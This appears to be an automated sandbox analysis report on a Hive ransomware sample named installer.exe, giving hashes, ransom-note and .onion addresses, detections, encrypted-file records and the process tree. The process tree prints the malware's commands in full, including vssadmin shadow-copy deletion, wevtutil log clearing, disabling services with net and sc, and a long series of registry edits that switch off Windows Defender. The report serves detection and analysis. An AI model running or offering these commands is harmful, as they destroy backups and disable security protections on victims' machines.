Analysis
-
max time kernel
127s -
max time network
120s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
05-01-2022 07:36
Static task
static1
Behavioral task
behavioral1
Sample
installer.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
installer.exe
Resource
win10-en-20211208
General
-
Target
installer.exe
-
Size
3.8MB
-
MD5
32bd8e6843879a761e6fa9436a90bb66
-
SHA1
26dde522d6f3f87ac982495028494c7f50799696
-
SHA256
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177
-
SHA512
c7e437c61980385ce57fe2a0dc0988aeba4609ac1ac7b7c07951c10c6bc38772c7ad1442571ab6409c8ea04991844e7ad95b5a9b35e31996f7aad9db4020716f
Malware Config
Extracted
C:\Program Files\7-Zip\rFSH_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1616 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1524 bcdedit.exe 1588 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
installer.exedescription ioc process File opened for modification C:\Program Files (x86)\Windows Media Player\Media Renderer\avtransport.xml installer.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_m.png installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\DELETE.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGLINACC.DPV.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files\Common Files\System\msadc\fr-FR\msadcer.dll.mui installer.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-image-inset.png installer.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png installer.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\gadget.xml installer.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\rFSH_HOW_TO_DECRYPT.txt installer.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Manaus.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS01635_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR33F.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\rFSH_HOW_TO_DECRYPT.txt installer.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-bullet.png installer.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full.png installer.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_sml.png installer.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14583_.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21390_.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\form_edit.js.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18234_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx installer.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\rFSH_HOW_TO_DECRYPT.txt installer.exe File opened for modification C:\Program Files\Common Files\System\msadc\handler.reg installer.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx installer.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02270_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\mshwLatin.dll.mui installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_03.MID.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00390_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png installer.exe File opened for modification C:\Program Files\DVD Maker\Shared\Parity.fx installer.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\ja-JP\chkrzm.exe.mui.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx installer.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_settings.png installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\HICCUP.WAV.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Windows Media Player\Skins\Revert.wmz installer.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_few-showers.png installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10337_.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR41F.GIF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECREC.CFG.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Groove.gif.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_ButtonGraphic.png installer.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\js\cpu.js installer.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\js\calendar.js installer.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYER.DPV.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_IAAAACAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_120.png installer.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass.png installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0238983.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png installer.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Proof.fr\rFSH_HOW_TO_DECRYPT.txt installer.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\BLUEPRNT.INF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02227_.WMF.W-mh58ELOt5UCfVNqw4O0TJ4L_vWJ4awCi-CNqd2LX7_AAAAAAAAAAA0.bvddx installer.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1476 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2512 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exeinstaller.exepid process 2080 powershell.exe 2172 powershell.exe 952 installer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1580 wevtutil.exe Token: SeBackupPrivilege 1580 wevtutil.exe Token: SeSecurityPrivilege 820 wevtutil.exe Token: SeBackupPrivilege 820 wevtutil.exe Token: SeSecurityPrivilege 1456 wevtutil.exe Token: SeBackupPrivilege 1456 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1908 wmic.exe Token: SeSecurityPrivilege 1908 wmic.exe Token: SeTakeOwnershipPrivilege 1908 wmic.exe Token: SeLoadDriverPrivilege 1908 wmic.exe Token: SeSystemProfilePrivilege 1908 wmic.exe Token: SeSystemtimePrivilege 1908 wmic.exe Token: SeProfSingleProcessPrivilege 1908 wmic.exe Token: SeIncBasePriorityPrivilege 1908 wmic.exe Token: SeCreatePagefilePrivilege 1908 wmic.exe Token: SeBackupPrivilege 1908 wmic.exe Token: SeRestorePrivilege 1908 wmic.exe Token: SeShutdownPrivilege 1908 wmic.exe Token: SeDebugPrivilege 1908 wmic.exe Token: SeSystemEnvironmentPrivilege 1908 wmic.exe Token: SeRemoteShutdownPrivilege 1908 wmic.exe Token: SeUndockPrivilege 1908 wmic.exe Token: SeManageVolumePrivilege 1908 wmic.exe Token: 33 1908 wmic.exe Token: 34 1908 wmic.exe Token: 35 1908 wmic.exe Token: SeIncreaseQuotaPrivilege 1072 wmic.exe Token: SeSecurityPrivilege 1072 wmic.exe Token: SeTakeOwnershipPrivilege 1072 wmic.exe Token: SeLoadDriverPrivilege 1072 wmic.exe Token: SeSystemProfilePrivilege 1072 wmic.exe Token: SeSystemtimePrivilege 1072 wmic.exe Token: SeProfSingleProcessPrivilege 1072 wmic.exe Token: SeIncBasePriorityPrivilege 1072 wmic.exe Token: SeCreatePagefilePrivilege 1072 wmic.exe Token: SeBackupPrivilege 1072 wmic.exe Token: SeRestorePrivilege 1072 wmic.exe Token: SeShutdownPrivilege 1072 wmic.exe Token: SeDebugPrivilege 1072 wmic.exe Token: SeSystemEnvironmentPrivilege 1072 wmic.exe Token: SeRemoteShutdownPrivilege 1072 wmic.exe Token: SeUndockPrivilege 1072 wmic.exe Token: SeManageVolumePrivilege 1072 wmic.exe Token: 33 1072 wmic.exe Token: 34 1072 wmic.exe Token: 35 1072 wmic.exe Token: SeIncreaseQuotaPrivilege 1072 wmic.exe Token: SeSecurityPrivilege 1072 wmic.exe Token: SeTakeOwnershipPrivilege 1072 wmic.exe Token: SeLoadDriverPrivilege 1072 wmic.exe Token: SeSystemProfilePrivilege 1072 wmic.exe Token: SeSystemtimePrivilege 1072 wmic.exe Token: SeProfSingleProcessPrivilege 1072 wmic.exe Token: SeIncBasePriorityPrivilege 1072 wmic.exe Token: SeCreatePagefilePrivilege 1072 wmic.exe Token: SeBackupPrivilege 1072 wmic.exe Token: SeRestorePrivilege 1072 wmic.exe Token: SeShutdownPrivilege 1072 wmic.exe Token: SeDebugPrivilege 1072 wmic.exe Token: SeSystemEnvironmentPrivilege 1072 wmic.exe Token: SeRemoteShutdownPrivilege 1072 wmic.exe Token: SeUndockPrivilege 1072 wmic.exe Token: SeManageVolumePrivilege 1072 wmic.exe Token: 33 1072 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
installer.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 952 wrote to memory of 1608 952 installer.exe net.exe PID 952 wrote to memory of 1608 952 installer.exe net.exe PID 952 wrote to memory of 1608 952 installer.exe net.exe PID 1608 wrote to memory of 1444 1608 net.exe net1.exe PID 1608 wrote to memory of 1444 1608 net.exe net1.exe PID 1608 wrote to memory of 1444 1608 net.exe net1.exe PID 952 wrote to memory of 520 952 installer.exe net.exe PID 952 wrote to memory of 520 952 installer.exe net.exe PID 952 wrote to memory of 520 952 installer.exe net.exe PID 520 wrote to memory of 588 520 net.exe net1.exe PID 520 wrote to memory of 588 520 net.exe net1.exe PID 520 wrote to memory of 588 520 net.exe net1.exe PID 952 wrote to memory of 288 952 installer.exe net.exe PID 952 wrote to memory of 288 952 installer.exe net.exe PID 952 wrote to memory of 288 952 installer.exe net.exe PID 288 wrote to memory of 1372 288 net.exe net1.exe PID 288 wrote to memory of 1372 288 net.exe net1.exe PID 288 wrote to memory of 1372 288 net.exe net1.exe PID 952 wrote to memory of 1376 952 installer.exe net.exe PID 952 wrote to memory of 1376 952 installer.exe net.exe PID 952 wrote to memory of 1376 952 installer.exe net.exe PID 1376 wrote to memory of 860 1376 net.exe net1.exe PID 1376 wrote to memory of 860 1376 net.exe net1.exe PID 1376 wrote to memory of 860 1376 net.exe net1.exe PID 952 wrote to memory of 1148 952 installer.exe net.exe PID 952 wrote to memory of 1148 952 installer.exe net.exe PID 952 wrote to memory of 1148 952 installer.exe net.exe PID 1148 wrote to memory of 1472 1148 net.exe net1.exe PID 1148 wrote to memory of 1472 1148 net.exe net1.exe PID 1148 wrote to memory of 1472 1148 net.exe net1.exe PID 952 wrote to memory of 428 952 installer.exe net.exe PID 952 wrote to memory of 428 952 installer.exe net.exe PID 952 wrote to memory of 428 952 installer.exe net.exe PID 428 wrote to memory of 1660 428 net.exe net1.exe PID 428 wrote to memory of 1660 428 net.exe net1.exe PID 428 wrote to memory of 1660 428 net.exe net1.exe PID 952 wrote to memory of 1152 952 installer.exe net.exe PID 952 wrote to memory of 1152 952 installer.exe net.exe PID 952 wrote to memory of 1152 952 installer.exe net.exe PID 1152 wrote to memory of 1524 1152 net.exe net1.exe PID 1152 wrote to memory of 1524 1152 net.exe net1.exe PID 1152 wrote to memory of 1524 1152 net.exe net1.exe PID 952 wrote to memory of 1868 952 installer.exe net.exe PID 952 wrote to memory of 1868 952 installer.exe net.exe PID 952 wrote to memory of 1868 952 installer.exe net.exe PID 1868 wrote to memory of 1460 1868 net.exe net1.exe PID 1868 wrote to memory of 1460 1868 net.exe net1.exe PID 1868 wrote to memory of 1460 1868 net.exe net1.exe PID 952 wrote to memory of 1940 952 installer.exe sc.exe PID 952 wrote to memory of 1940 952 installer.exe sc.exe PID 952 wrote to memory of 1940 952 installer.exe sc.exe PID 952 wrote to memory of 1136 952 installer.exe sc.exe PID 952 wrote to memory of 1136 952 installer.exe sc.exe PID 952 wrote to memory of 1136 952 installer.exe sc.exe PID 952 wrote to memory of 296 952 installer.exe sc.exe PID 952 wrote to memory of 296 952 installer.exe sc.exe PID 952 wrote to memory of 296 952 installer.exe sc.exe PID 952 wrote to memory of 1768 952 installer.exe sc.exe PID 952 wrote to memory of 1768 952 installer.exe sc.exe PID 952 wrote to memory of 1768 952 installer.exe sc.exe PID 952 wrote to memory of 1064 952 installer.exe sc.exe PID 952 wrote to memory of 1064 952 installer.exe sc.exe PID 952 wrote to memory of 1064 952 installer.exe sc.exe PID 952 wrote to memory of 1792 952 installer.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1444
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:588
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:288 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1372
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:860
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1472
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1660
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1524
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1460
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1940
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1136
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:296
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1768
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1064
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1792
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:752
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1464
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1684
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1720
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1584
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:900
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:268
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:748
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:544
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1396
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1820
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1668
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1648
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1460
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1800
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:856
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1084
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:2032
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1332
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1612
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1916
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1144
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:996
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1372
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:860
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1492
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1056
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:940
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1992
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1892
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1712
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1592
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:524 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1656
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1476 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:820 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1456 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908 -
